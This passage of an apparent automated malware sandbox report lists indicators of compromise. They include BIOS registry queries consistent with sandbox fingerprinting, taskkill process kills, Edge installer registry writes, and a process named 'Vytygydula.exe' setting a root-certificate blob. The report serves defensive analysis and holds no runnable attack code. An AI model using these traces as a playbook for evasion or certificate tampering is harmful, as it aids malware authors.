opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS autosubplayer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU autosubplayer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1148 taskkill.exe 4388 taskkill.exe 5324 taskkill.exe 9084 taskkill.exe -
Processes:
setup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} setup.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\94.0.992.50\\BHO" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\94.0.992.50\\BHO" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration setup.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
MicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exesetup.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%systemroot%\system32\FirewallControlPanel.dll,-12122 = "Windows Defender Firewall" setup.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople MicrosoftEdgeUpdate.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exesetup.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdateComRegisterShell64.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdate.exeMicrosoftEdgeUpdateComRegisterShell64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ = "IJobObserver2" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MSEdgeHTM\Application\ApplicationDescription = "Browse the web" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32\ = "{B532B342-0E34-448B-9EDF-1D55C04041F8}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E} MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods\ = "8" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\Elevation MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\VersionIndependentProgID MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\ = "IProgressWndEvents" MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\VERSIONINDEPENDENTPROGID MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods\ = "11" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher\CurVer\ = "MicrosoftEdgeUpdate.ProcessLauncher.1.0" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\ = "Google Update Policy Status Class" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\NumMethods\ = "24" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\DefaultIcon setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.Update3COMClassService" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods\ = "8" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\Elevation\Enabled = "1" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.webp\OpenWithProgids\MSEdgeHTM setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F09CD6C-5964-4573-82E3-EBFF7702865B}\ProgID\ = "MicrosoftEdgeUpdate.CoreClass.1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{B532B342-0E34-448B-9EDF-1D55C04041F8}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0}\ = "IAppBundleWeb" MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{628ACE20-B77A-456F-A88D-547DB6CEEDD5} setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{ABD63202-F52F-4225-9C85-19DD88589B66}\InprocHandler32 MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABD63202-F52F-4225-9C85-19DD88589B66} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6B716CB-028B-404D-B72C-50E153DD68DA}\ = "Microsoft Edge Update Legacy On Demand" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{837E40DA-EB1B-440C-8623-0F14DF158DC0} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\ELEVATION MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D48CE47-9E1C-4D41-B480-260563C0B724}\InProcServer32\ThreadingModel = "Both" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.ProcessLauncher\CLSID\ = "{08D832B9-D2FD-481F-98CF-904D00DF63CC}" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32\ = "{9D48CE47-9E1C-4D41-B480-260563C0B724}" MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine.1.0\ = "Microsoft Edge Update Broker Class Factory" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ProxyStubClsid32\ = "{B532B342-0E34-448B-9EDF-1D55C04041F8}" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ProxyStubClsid32 MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{77857D02-7A25-4B67-9266-3E122A8F39E4}\LOCALSERVER32 MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ = "IGoogleUpdate3" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C} MicrosoftEdgeUpdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26} MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\Elevation MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{08D832B9-D2FD-481F-98CF-904D00DF63CC}\ = "Microsoft Edge Update Process Launcher Class" MicrosoftEdgeUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\NumMethods\ = "24" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69} MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32 MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84} MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState" MicrosoftEdgeUpdateComRegisterShell64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\NumMethods MicrosoftEdgeUpdateComRegisterShell64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithProgIds\MSEdgeMHT setup.exe -
Processes:
installer.exeVytygydula.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a028201